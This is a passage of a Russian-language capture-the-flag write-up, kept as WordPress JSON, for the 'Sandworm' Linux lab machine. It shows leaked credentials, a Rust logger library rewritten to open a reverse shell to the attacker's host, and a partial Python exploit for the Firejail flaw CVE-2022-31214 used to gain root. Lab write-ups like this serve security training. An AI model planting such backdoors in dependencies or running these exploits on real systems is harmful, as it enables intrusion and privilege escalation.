\n{\n    "__meta__": {\n        "about": "HTTPie session file",\n        "help": "https:\/\/httpie.io\/docs#sessions",\n        "httpie": "2.6.0"\n    },\n    "auth": {\n        "password": "quietLiketheWind22",\n        "type": null,\n        "username": "silentobserver"\n    },\n    "cookies": {\n        "session": {\n            "expires": null,\n            "path": "\/",\n            "secure": false,\n            "value": "eyJfZmxhc2hlcyI6W3siIHQiOlsibWVzc2FnZSIsIkludmFsaWQgY3JlZGVudGlhbHMuIl19XX0.Y-I86w.JbELpZIwyATpR58qg1MGJsd6FkA"\n        }\n    },\n    "headers": {\n        "Accept": "application\/json, *\/*;q=0.5"\n    }\n}\n<\/pre><\/div>\n\n\n
\u041f\u043e\u0434\u043a\u043b\u044e\u0447\u0438\u043c\u0441\u044f \u043f\u043e ssh \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u0423\u0417 (silentobserver:quietLiketheWind22<\/code>) \u0438 \u0443\u0441\u043f\u0435\u0448\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u043c \u0444\u043b\u0430\u0433 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f!<\/p>\n\n\n\n
\u0420\u0430\u0437\u0432\u0438\u0442\u0438\u0435 \u0430\u0442\u0430\u043a\u0438 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \/opt\/tipnet<\/h3>\n\n\n\n
\u0421\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u043e, \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 \u043f\u0435\u0440\u0432\u044b\u0445 \u0448\u0430\u0433\u043e\u0432 \u043f\u043e \u043f\u043e\u0438\u0441\u043a\u0443 \u043a\u043e\u043c\u0430\u043d\u0434, \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u0431\u043e\u043b\u0435\u0435 \u0432\u044b\u0441\u043e\u043a\u043e \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0423\u0417 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u043c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0435 \u0434\u0432\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b: <\/p>\n\n\n\n
\n
sudo -l; find \/ -perm -4000 -type f 2>\/dev\/null<\/code><\/p>\n<\/blockquote>\n\n\n\n
\u041f\u043e\u0441\u043b\u0435 \u0432\u0432\u043e\u0434\u0430 \u043f\u0430\u0440\u043e\u043b\u044f \u0423\u0417 \u0434\u043b\u044f \u043f\u0435\u0440\u0432\u043e\u0439 \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u043f\u043e\u043b\u0443\u0447\u0438\u043c \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0435 \u043e \u0442\u043e\u043c, \u0447\u0442\u043e \u0434\u0430\u043d\u043d\u044b\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043d\u0435 \u043c\u043e\u0436\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c sudo. \u041f\u043e\u0438\u0441\u043a \u0444\u0430\u0439\u043b\u043e\u0432 \u0441 \u043f\u0440\u0438\u0432\u0451\u043b \u043a \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u043c\u0443 \u0441\u043f\u0438\u0441\u043a\u0443:<\/p>\n\n\n
\n\/opt\/tipnet\/target\/debug\/tipnet\n\/opt\/tipnet\/target\/debug\/deps\/tipnet-a859bd054535b3c1\n\/opt\/tipnet\/target\/debug\/deps\/tipnet-dabc93f7704f7b48\n\/usr\/local\/bin\/firejail\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/libexec\/polkit-agent-helper-1\n\/usr\/bin\/mount\n\/usr\/bin\/sudo\n\/usr\/bin\/gpasswd\n\/usr\/bin\/umount\n\/usr\/bin\/passwd\n\/usr\/bin\/chsh\n\/usr\/bin\/chfn\n\/usr\/bin\/newgrp\n\/usr\/bin\/su\n\/usr\/bin\/fusermount3\n<\/pre><\/div>\n\n\n
\u041f\u0440\u043e\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u0439 \u043a\u043e\u0434 \/opt\/tipnet\/target\/debug\/tipnet<\/code>:<\/p>\n\n\n
\nextern crate logger;\nuse sha2::{Digest, Sha256};\nuse chrono::prelude::*;\nuse mysql::*;\nuse mysql::prelude::*;\nuse std::fs;\nuse std::process::Command;\nuse std::io;\n\n\/\/ We don't spy on you... much.\n\nstruct Entry {\n    timestamp: String,\n    target: String,\n    source: String,\n    data: String,\n}\n\nfn main() {\n    println!("                                                     \n             ,,                                      \nMMP\\"\\"MM\\"\\"YMM db          `7MN.   `7MF'         mm    \nP'   MM   `7               MMN.    M           MM    \n     MM    `7MM `7MMpdMAo. M YMb   M  .gP\\"Ya mmMMmm  \n     MM      MM   MM   `Wb M  `MN. M ,M'   Yb  MM    \n     MM      MM   MM    M8 M   `MM.M 8M\\"\\"\\"\\"\\"\\"  MM    \n     MM      MM   MM   ,AP M     YMM YM.    ,  MM    \n   .JMML.  .JMML. MMbmmd'.JML.    YM  `Mbmmd'  `Mbmo \n                  MM                                 \n                .JMML.                               \n\n");\n\n\n    let mode = get_mode();\n    \n    if mode == "" {\n            return;\n    }\n    else if mode != "upstream" &amp;&amp; mode != "pull" {\n        println!("[-] Mode is still being ported to Rust; try again later.");\n        return;\n    }\n\n    let mut conn = connect_to_db("Upstream").unwrap();\n\n\n    if mode == "pull" {\n        let source = "\/var\/www\/html\/SSA\/SSA\/submissions";\n        pull_indeces(&amp;mut conn, source);\n        println!("[+] Pull complete.");\n        return;\n    }\n\n    println!("Enter keywords to perform the query:");\n    let mut keywords = String::new();\n    io::stdin().read_line(&amp;mut keywords).unwrap();\n\n    if keywords.trim() == "" {\n        println!("[-] No keywords selected.\\n\\n[-] Quitting...\\n");\n        return;\n    }\n\n    println!("Justification for the search:");\n    let mut justification = String::new();\n    io::stdin().read_line(&amp;mut justification).unwrap();\n\n    \/\/ Get Username \n    let output = Command::new("\/usr\/bin\/whoami")\n        .output()\n        .expect("nobody");\n\n    let username = String::from_utf8(output.stdout).unwrap();\n    let username = username.trim();\n\n    if justification.trim() == "" {\n        println!("[-] No justification provided. TipNet is under 702 authority; queries don't need warrants, but need to be justified. This incident has been logged and will be reported.");\n        logger::log(username, keywords.as_str().trim(), "Attempted to query TipNet without justification.");\n        return;\n    }\n\n    logger::log(username, keywords.as_str().trim(), justification.as_str());\n\n    search_sigint(&amp;mut conn, keywords.as_str().trim());\n\n}\n\nfn get_mode() -&gt; String {\n\n        let valid = false;\n        let mut mode = String::new();\n\n        while ! valid {\n                mode.clear();\n\n                println!("Select mode of usage:");\n                print!("a) Upstream \\nb) Regular (WIP)\\nc) Emperor (WIP)\\nd) SQUARE (WIP)\\ne) Refresh Indeces\\n");\n\n                io::stdin().read_line(&amp;mut mode).unwrap();\n\n                match mode.trim() {\n                        "a" =&gt; {\n                              println!("\\n[+] Upstream selected");\n                              return "upstream".to_string();\n                        }\n                        "b" =&gt; {\n                              println!("\\n[+] Muscular selected");\n                              return "regular".to_string();\n                        }\n                        "c" =&gt; {\n                              println!("\\n[+] Tempora selected");\n                              return "emperor".to_string();\n                        }\n                        "d" =&gt; {\n                                println!("\\n[+] PRISM selected");\n                                return "square".to_string();\n                        }\n                        "e" =&gt; {\n                                println!("\\n[!] Refreshing indeces!");\n                                return "pull".to_string();\n                        }\n                        "q" | "Q" =&gt; {\n                                println!("\\n[-] Quitting");\n                                return "".to_string();\n                        }\n                        _ =&gt; {\n                                println!("\\n[!] Invalid mode: {}", mode);\n                        }\n                }\n        }\n        return mode;\n}\n\nfn connect_to_db(db: &amp;str) -&gt; Result&lt;mysql::PooledConn&gt; {\n    let url = "mysql:\/\/tipnet:4The_Greater_GoodJ4A@localhost:3306\/Upstream";\n    let pool = Pool::new(url).unwrap();\n    let mut conn = pool.get_conn().unwrap();\n    return Ok(conn);\n}\n\nfn search_sigint(conn: &amp;mut mysql::PooledConn, keywords: &amp;str) {\n    let keywords: Vec&lt;&amp;str&gt; = keywords.split(" ").collect();\n    let mut query = String::from("SELECT timestamp, target, source, data FROM SIGINT WHERE ");\n\n    for (i, keyword) in keywords.iter().enumerate() {\n        if i &gt; 0 {\n            query.push_str("OR ");\n        }\n        query.push_str(&amp;format!("data LIKE '%{}%' ", keyword));\n    }\n    let selected_entries = conn.query_map(\n        query,\n        |(timestamp, target, source, data)| {\n            Entry { timestamp, target, source, data }\n        },\n        ).expect("Query failed.");\n    for e in selected_entries {\n        println!("[{}] {} ===&gt; {} | {}",\n                 e.timestamp, e.source, e.target, e.data);\n    }\n}\n\nfn pull_indeces(conn: &amp;mut mysql::PooledConn, directory: &amp;str) {\n    let paths = fs::read_dir(directory)\n        .unwrap()\n        .filter_map(|entry| entry.ok())\n        .filter(|entry| entry.path().extension().unwrap_or_default() == "txt")\n        .map(|entry| entry.path());\n\n    let stmt_select = conn.prep("SELECT hash FROM tip_submissions WHERE hash = :hash")\n        .unwrap();\n    let stmt_insert = conn.prep("INSERT INTO tip_submissions (timestamp, data, hash) VALUES (:timestamp, :data, :hash)")\n        .unwrap();\n\n    let now = Utc::now();\n\n    for path in paths {\n        let contents = fs::read_to_string(path).unwrap();\n        let hash = Sha256::digest(contents.as_bytes());\n        let hash_hex = hex::encode(hash);\n\n        let existing_entry: Option&lt;String&gt; = conn.exec_first(&amp;stmt_select, params! { "hash" =&gt; &amp;hash_hex }).unwrap();\n        if existing_entry.is_none() {\n            let date = now.format("%Y-%m-%d").to_string();\n            println!("[+] {}\\n", contents);\n            conn.exec_drop(&amp;stmt_insert, params! {\n                "timestamp" =&gt; date,\n                "data" =&gt; contents,\n                "hash" =&gt; &amp;hash_hex,\n                },\n                ).unwrap();\n        }\n    }\n    logger::log("ROUTINE", " - ", "Pulling fresh submissions into database.");\n\n}\n<\/pre><\/div>\n\n\n
\u041f\u0440\u043e\u0430\u043d\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u0432 \u043a\u043e\u0434 tipnet \u0437\u0430\u043c\u0435\u0442\u0438\u043c \u0432\u043d\u0435\u0448\u043d\u0438\u0439 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440 Rust logger<\/code>.<\/p>\n\n\n\n
\u0411\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0430, \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u044e\u0449\u0430\u044f \u043b\u043e\u0433\u0438\u043a\u0443 \u0440\u0430\u0431\u043e\u0442\u044b \u0432\u043d\u0435\u0448\u043d\u0435\u0433\u043e \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u0430 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442\u0441\u044f \u0432 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438 \/opt\/<\/code>crates\/logger\/src\/lib.rs, \u0442\u0430\u043a\u0436\u0435 \u043f\u0440\u043e\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u0439 \u043a\u043e\u0434 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0438:<\/p>\n\n\n
\nextern crate chrono;\n\nuse std::fs::OpenOptions;\nuse std::io::Write;\nuse chrono::prelude::*;\n\npub fn log(user: &amp;str, query: &amp;str, justification: &amp;str) {\n    let now = Local::now();\n    let timestamp = now.format("%Y-%m-%d %H:%M:%S").to_string();\n    let log_message = format!("[{}] - User: {}, Query: {}, Justification: {}\\n", timestamp, user, query, justification);\n\n    let mut file = match OpenOptions::new().append(true).create(true).open("\/opt\/tipnet\/access.log") {\n        Ok(file) =&gt; file,\n        Err(e) =&gt; {\n            println!("Error opening log file: {}", e);\n            return;\n        }\n    };\n\n    if let Err(e) = file.write_all(log_message.as_bytes()) {\n        println!("Error writing to log file: {}", e);\n    }\n}\n<\/pre><\/div>\n\n\n
\u0417\u0430\u0433\u0440\u0443\u0437\u0438\u043c \u043d\u0430 \u0446\u0435\u043b\u0435\u0432\u0443\u044e \u043c\u0430\u0448\u0438\u043d\u0443 pspy64<\/code> \u0438 \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u043c \u0435\u0433\u043e:<\/p>\n\n\n
\n[...]\n2023\/X\/X X:X:X CMD: UID=0     PID=22523  | \/bin\/sh -c cd \/opt\/tipnet &amp;&amp; \/bin\/echo "e" | \/bin\/sudo -u atlas \/usr\/bin\/cargo run --offline\n[...]\n<\/pre><\/div>\n\n\n
\u0417\u043d\u0430\u0447\u0438\u0442 \u043d\u0430 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435 \u043f\u0435\u0440\u0438\u043e\u0434\u0438\u0447\u0435\u0441\u043a\u0438 \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442 \u0437\u0430\u043f\u0443\u0441\u043a tipnet <\/code>\u043e\u0442 \u043b\u0438\u0446\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f atlas<\/strong><\/code>. \u0422\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c, \u0435\u0441\u043b\u0438 \u0432\u043d\u0435\u0441\u0442\u0438 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f \u0432 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0443 lib.rs<\/code>, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0432\u044b\u0437\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u043f\u0440\u0438 \u0438\u0441\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0438 \/opt\/tipnet<\/code>, \u0442\u043e \u043c\u044b \u043f\u043e\u043b\u0443\u0447\u0438\u043c \u043d\u0435 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u043d\u0443\u044e \u043a\u0430\u043a\u0438\u043c\u0438-\u043b\u0438\u0431\u043e \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0430\u043c\u0438 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044f \u0441\u0435\u0441\u0441\u0438\u044e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f atlas<\/strong><\/code>, \u0447\u0442\u043e \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u043c\u043e\u0447\u044c \u043d\u0430\u043c \u0432 \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u043c \u043f\u0440\u0438 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0438 \u0434\u043e root<\/strong><\/code>.<\/p>\n\n\n\n
\u041e\u0442\u0440\u0435\u0434\u0430\u043a\u0442\u0438\u0440\u0443\u0435\u043c \u0444\u0430\u0439\u043b \/opt\/<\/code>crates\/logger\/src\/lib.rs \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0439 \u0441\u0435\u0441\u0441\u0438\u0438 \u043e\u0442 \u043b\u0438\u0446\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f atlas<\/strong><\/code>:<\/p>\n\n\n
\nextern crate chrono;\n\nuse std::fs::OpenOptions;\nuse std::io::Write;\nuse chrono::prelude::*;\nuse std::process::Command;\n\npub fn log(user: &amp;str, query: &amp;str, justification: &amp;str) {\n    let command = "bash -i &gt;&amp; \/dev\/tcp\/10.10.16.10\/7331 0&gt;&amp;1";\n\n    let output = Command::new("bash")\n        .arg("-c")\n        .arg(command)\n        .output()\n        .expect("error");\n\n    if output.status.success() {\n        let stdout = String::from_utf8_lossy(&amp;output.stdout);\n        let stderr = String::from_utf8_lossy(&amp;output.stderr);\n\n        println!("standar output: {}", stdout);\n        println!("error output: {}", stderr);\n    } else {\n        let stderr = String::from_utf8_lossy(&amp;output.stderr);\n        eprintln!("Error: {}", stderr);\n    }\n\n    let now = Local::now();\n    let timestamp = now.format("%Y-%m-%d %H:%M:%S").to_string();\n    let log_message = format!("[{}] - User: {}, Query: {}, Justification: {}\\n", timestamp, user, query, justification);\n\n    let mut file = match OpenOptions::new().append(true).create(true).open("\/opt\/tipnet\/access.log") {\n        Ok(file) =&gt; file,\n        Err(e) =&gt; {\n            println!("Error opening log file: {}", e);\n            return;\n        }\n    };\n\n    if let Err(e) = file.write_all(log_message.as_bytes()) {\n        println!("Error writing to log file: {}", e);\n    }\n}\n<\/pre><\/div>\n\n\n
\u041e\u0442\u043a\u0440\u044b\u0432 \u043f\u043e\u0440\u0442 \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f Reverse Shell \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e nc -nvlp 7331<\/code> \u043f\u043e\u043b\u0443\u0447\u0438\u043c \u0441\u0435\u0441\u0441\u0438\u044e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f altas<\/code><\/strong>.<\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
<\/p>\n\n\n\n
\u041f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 root \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e CVE-2022-31214<\/h3>\n\n\n\n
\u041f\u043e\u043b\u0443\u0447\u0438\u0432 \u043f\u043e\u043b\u043d\u043e\u0446\u0435\u043d\u043d\u044b\u0439 \u0434\u043e\u0441\u0442\u0443\u043f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f atlas<\/strong><\/code> \u0442\u0435\u043f\u0435\u0440\u044c \u043c\u044b \u043c\u043e\u0436\u0435\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u0432\u0441\u0435 \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043d\u0435 \u0431\u044b\u043b\u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b \u043d\u0430\u043c \u0440\u0430\u043d\u0435\u0435 \u0438\u0437-\u0437\u0430 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u0439 Firejail. \u0422\u0430\u043a\u0436\u0435, \u0432\u044b\u044f\u0441\u043d\u0438\u043b\u0438, \u0447\u0442\u043e atlas<\/code><\/strong> \u0432\u0445\u043e\u0434\u0438\u0442 \u0433\u0440\u0443\u043f\u043f\u0443 jailer<\/code> \u0438 \u0443 \u043d\u0435\u0433\u043e \u0435\u0441\u0442\u044c \u043f\u0440\u0430\u0432\u0430 \u043d\u0430 \u0434\u043e\u0441\u0442\u0443\u043f \u043a Firejail:<\/p>\n\n\n
\natlas@sandworm:\/opt\/tipnet$ id\nuid=1000(atlas) gid=1000(atlas) groups=1000(atlas),1002(jailer)\natlas@sandworm:\/opt\/tipnet$ la -la \/usr\/local\/bin\/firejail\n-rwsr-x--- 1 root jailer 1777952 Nov 29 2022 \/usr\/local\/bin\/firejail\n<\/pre><\/div>\n\n\n
\u042d\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0430\u043c \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442\u043e\u043c CVE-2022-31214. \u0414\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u0441\u043e\u0437\u0434\u0430\u0434\u0438\u043c \u0432\u0442\u043e\u0440\u0443\u044e \u0441\u0435\u0441\u0441\u0438\u044e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f atlas<\/strong><\/code>. \u0412 \u0442\u0435\u043a\u0443\u0449\u0435\u0439 \u0441\u0435\u0441\u0441\u0438\u0438 \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0441\u044f \u043a\u043e\u0434\u043e\u043c \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0434\u0430\u043d\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0430 \u044f\u0437\u044b\u043a\u0435 Python:<\/p>\n\n\n
\n#!\/usr\/bin\/python3\n\nimport os\nimport shutil\nimport stat\nimport subprocess\nimport sys\nimport tempfile\nimport time\nfrom pathlib import Path\n\n# Print error message and exit with status 1\ndef printe(*args, **kwargs):\n    kwargs['file'] = sys.stderr\n    print(*args, **kwargs)\n    sys.exit(1)\n\n# Return a boolean whether the given file path fulfils the requirements for the\n# exploit to succeed:\n# - owned by uid 0\n# - size of 1 byte\n# - the content is a single '1' ASCII character\ndef checkFile(f):\n    s = os.stat(f)\n\n    if s.st_uid != 0 or s.st_size != 1 or not stat.S_ISREG(s.st_mode):\n        return False\n\n    with open(f) as fd:\n        ch = fd.read(2)\n\n        if len(ch) != 1 or ch != "1":\n            return False\n\n    return True\n\ndef mountTmpFS(loc):\n    subprocess.check_call("mount -t tmpfs none".split() + [loc])\n\ndef bindMount(src, dst):\n    subprocess.check_call("mount --bind".split() + [src, dst])\n\ndef checkSelfExecutable():\n    s = os.stat(__file__)\n\n    if (s.st_mode &amp; stat.S_IXUSR) == 0:\n        printe(f"{__file__} needs to have the execute bit set for the exploit to \\\nwork. Run &lt;code&gt;chmod +x {__file__}&lt;\/code&gt; and try again.")\n\n# This creates a "helper" sandbox that serves the purpose of making available\n# a proper "join" file for symlinking to as part of the exploit later on.\n#\n# Returns a tuple of (proc, join_file), where proc is the running subprocess\n# (it needs to continue running until the exploit happened) and join_file is\n# the path to the join file to use for the exploit.\ndef createHelperSandbox():\n    # just run a long sleep command in an unsecured sandbox\n    proc = subprocess.Popen(\n            "firejail --noprofile -- sleep 10d".split(),\n            stderr=subprocess.PIPE)\n\n    # read out the child PID from the stderr output of firejail\n    while True:\n        line = proc.stderr.readline()\n        if not line:\n            raise Exception("helper sandbox creation failed")\n\n        # on stderr a line of the form "Parent pid &lt;ppid&gt;, child pid &lt;pid&gt;" is output\n        line = line.decode('utf8').strip().lower()\n        if line.find("child pid") == -1:\n            continue\n<\/pre><\/div>\n\n\n
\u0417\u0430\u043f\u0443\u0441\u0442\u0438\u043c \u043a\u043e\u0434 \u0438 \u0432\u043e \u0432\u0442\u043e\u0440\u043e\u0439 \u0441\u0435\u0441\u0441\u0438\u0438 \u0432\u0432\u0435\u0434\u0451\u043c \u043a\u043e\u043c\u0430\u043d\u0434\u0443, \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u0443\u044e \u0432 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u0440\u0430\u0431\u043e\u0442\u044b \u0441\u043a\u0440\u0438\u043f\u0442\u0430:<\/p>\n\n\n\n
<\/p>\n\n\n
\n
\"\"
\u041f\u0435\u0440\u0432\u0430\u044f \u0441\u0435\u0441\u0441\u0438\u044f, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0437\u0430\u043f\u0443\u0449\u0435\u043d \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442<\/figcaption><\/figure><\/div>\n\n\n
<\/p>\n\n\n
\n
\"\"
\u0412\u0442\u043e\u0440\u0430\u044f \u0441\u0435\u0441\u0441\u0438\u044f, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0438 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435 \u0434\u043e root<\/figcaption><\/figure><\/div>\n\n\n
\u041c\u044b \u0441\u043c\u043e\u0433\u043b\u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e root<\/code> \u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u0435\u0433\u043e \u0444\u043b\u0430\u0433!<\/p>\n","protected":false},"excerpt":{"rendered":"
\u0421\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u044c: Medium \u041e\u0421: Linux \u0411\u0430\u043b\u043b\u044b: 30 IP: 10.10.11.218 \u0422\u0435\u0433\u0438: PGP, SSTI, Firejail, SUID Binary, Code Analysis, CVE-2022-31214 \u041a\u0440\u0430\u0442\u043a\u043e\u0435 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0440\u0435\u0448\u0435\u043d\u0438\u044f \u041f\u043e\u0441\u043b\u0435 \u043f\u0435\u0440\u0432\u0438\u0447\u043d\u043e\u0439 \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438 \u0432\u0435\u0431-\u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u043c\u044b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0430\u0435\u043c \u0441\u0435\u0440\u0432\u0438\u0441 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 \u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u043e\u0441\u0442\u0438 PGP \u043f\u043e\u0434\u043f\u0438\u0441\u0438, \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0439 \u043a SSTI. \u0421 \u043f\u043e\u043c\u043e\u0449\u044c\u044e SSTI \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u043d\u044b\u0439 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 atlas \u0438\u0437-\u0437\u0430 \u0440\u0430\u0431\u043e\u0442\u044b Firejail. \u0414\u0430\u043b\u0435\u0435, \u0432 \u0445\u043e\u0434\u0435 \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 \u0432 \u0434\u043e\u043c\u0430\u0448\u043d\u0435\u0439 […]<\/p>\n","protected":false},"author":5,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-876","post","type-post","status-publish","format-standard","hentry","category-blog"],"translation":{"provider":"WPGlobus","version":"3.0.0","language":"en","enabled_languages":["ru","en"],"languages":{"ru":{"title":true,"content":true,"excerpt":false},"en":{"title":false,"content":false,"excerpt":false}}},"_links":{"self":[{"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/posts\/876","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/comments?post=876"}],"version-history":[{"count":33,"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/posts\/876\/revisions"}],"predecessor-version":[{"id":917,"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/posts\/876\/revisions\/917"}],"wp:attachment":[{"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/media?parent=876"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/categories?post=876"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/tags?post=876"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}